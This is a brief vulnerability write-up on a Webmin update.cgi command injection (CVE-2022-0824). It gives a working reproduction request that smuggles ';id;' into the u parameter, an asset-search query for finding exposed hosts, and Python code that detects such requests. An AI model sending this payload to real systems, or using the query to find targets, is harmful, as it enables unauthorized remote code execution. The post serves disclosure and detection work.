Webmin update.cgi background remote command execution vulnerability CVE-2022-0824
Vulnerability Description
Webmin is a web-based system administration tool for Unix-like operating systems, maintained by the Webmin community.
Webmin versions before 1.990 contain a security vulnerability caused by incorrect access control. An attacker can exploit it to achieve remote code execution.
Affected Versions
Webmin < 1.990
Network asset mapping query
app="webmin"
Vulnerability Reproduction
Login page
After logging in, send the following request:
POST /package-updates/update.cgi HTTP/1.1
Cookie: sid=882af4543067bc6214d2c769325f3b2f
Referer: https:///package-updates/update.cgi?xnavigation=1
mode=new&search=ssh&redir=&redirdesc=&u=0;id;&confirm=Install+Now
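For detection, the request above has a recognisable shape: a POST to /package-updates/update.cgi whose u parameter carries shell metacharacters. The following check is an added example, not part of the original post or of Webmin; the function names, the metacharacter set, the host webmin.example and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

TARGET_PATH = "/package-updates/update.cgi"
# Assumption: a legitimate package identifier in "u" never needs these characters.
SHELL_META = re.compile(r"[;|&`$(){}<>\\\r\n]")

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, decoded form pairs)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split(" ")
    if len(parts) < 2:  # malformed request line: nothing to inspect
        return "", "", []
    pairs = []
    for field in body.strip().split("&"):
        if field:
            name, _, value = field.partition("=")
            # Decode before matching so %3B is treated the same as ';'
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return parts[0].upper(), urlsplit(parts[1]).path, pairs

def flag_update_cgi(raw):
    """Return the decoded "u" values that carry shell metacharacters."""
    method, path, pairs = parse_request(raw)
    if method != "POST" or not path.endswith(TARGET_PATH):
        return []
    return [v for k, v in pairs if k == "u" and SHELL_META.search(v)]

# Constructed sample requests (host and cookie are placeholders).
HEAD = ("POST /package-updates/update.cgi HTTP/1.1\r\n"
        "Host: webmin.example\r\nCookie: sid=PLACEHOLDER\r\n\r\n")
SAMPLES = {
    "page_request": HEAD + "mode=new&search=ssh&redir=&redirdesc=&u=0;id;&confirm=Install+Now",
    "url_encoded": HEAD + "mode=new&u=0%3Bid%3B&confirm=Install+Now",
    "benign": HEAD + "mode=new&search=ssh&u=openssh-server&confirm=Install+Now",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, flag_update_cgi(raw))
```

The same match can be applied to reverse-proxy or WAF request logs that record POST bodies; hosts still running a version before 1.990 should be upgraded regardless of what the logs show.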
This post is licensed under CC BY 4.0 by the author.